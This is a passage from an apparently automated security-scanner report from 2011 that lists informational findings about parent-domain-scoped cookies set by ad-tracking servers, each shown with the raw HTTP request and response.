Path:   /site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:29 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:29 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=1608123674&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_
...[SNIP]...

8.9. http://cm.au.thewest.overture.com/js_flat_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.au.thewest.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?config=6518910550&source=thewest_y7news_au_ctxt&type=thewest_y7news&ctxtId=thewest_y7news&mkt=au&maxCount=3&keywordCharEnc=UTF8&outputCharEnc=UTF8&ctxtUrl=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F HTTP/1.1
Host: cm.au.thewest.overture.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDEyNjEzNXc0cAN9RMwAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sat, 04-Sep-2021 14:15:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 554

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Sponsored Links",
"http://searchmarketing.yahoo.com/en_AU/",
"",
"Lifebroker.",
"",
"http://rc.asia.sr
...[SNIP]...

8.10. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V12F568CAD2J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q06E0F03A000059/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Thu, 06 Sep 2012 14:14:20 GMT;domain=.zedo.com;path=/;
ETag: "436874d-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=25882
Expires: Wed, 07 Sep 2011 21:25:42 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

8.11. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/130511/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/130511/0/vj?z=hpi&dim=63352&pos=1&pv=6402171833906324&nc=59081627&tz=300&url=http%3A%2F%2Fwww.perthnow.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: ajess1_32177B6AC43D44C99988CDC0=a; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Set-Cookie: i=202013Ji03cHD3JhX00001N816qkP20GX142872422_84859000003JPq; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:14:18 GMT; Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X0003BIY; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Content-Type: application/x-javascript
Content-Length: 378
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V128E2DB70EJ-573I706K6334213
...[SNIP]...

8.12. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/80617/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/80617/0/vj?z=hpi&dim=63352&pos=1&pv=6592370152939112&nc=20039895&tz=300&url=http%3A%2F%2Fwww.ntnews.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689
Content-Type: application/x-javascript
Content-Length: 377
Date: Wed, 07 Sep 2011 14:17:27 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121145851DJ-573I706K63342132
...[SNIP]...

8.13. http://i.w55c.net/a.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /a.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.gif?t=0&id=0RlCN4ZmQt0FXYalebQa&si=2995815&pcid=1027317&ei=RMX&ci=8998917&p=258&s=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D15%2Ehtml%3Fcb%3D0%2E33166992268525064&reqid=1315404893&cat=32 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:06 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:06 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.14. http://i.w55c.net/m.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /m.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=ADBRITE&cver=1&euid=MTY4Mjk2NTQyeDAuMDk2IDEzMTQ4OTI0NTR4LTM2NTcxMDg5MQ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:33 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.15. http://i.w55c.net/m_yahoo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /m_yahoo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:44 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F82e0303e4a9098b0c77927fc;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:44 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.16. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; optout=1

Response

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:14:15 GMT
Cache-Control: private
Content-Length: 0
X-Version: DataXu Pixel Tracker v3
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
Via: 1.1 bfi061004 (MII-APC/2.1)
Content-Type: text/plain


8.17. http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=oTAg0OH1iUX1aGNgIW2wChfkIoSLJt8xuDMfOFyxVg=oGRBdwqM85CGy488; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=7DcJ8TkxZNuojatwkS_Hu7O0sJMqlxF_nzrxj0mfuw=5NnmLWq9agBvrwLy; expires=Thu, 08-Mar-2012 14:14:01 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:14:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

8.18. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:44 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.19. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=46812628&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^7; rdk=7725/12338; rdk2=0; ses2=12338^12&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddc890c2ebd61ea165; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^77; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63579; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.20. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
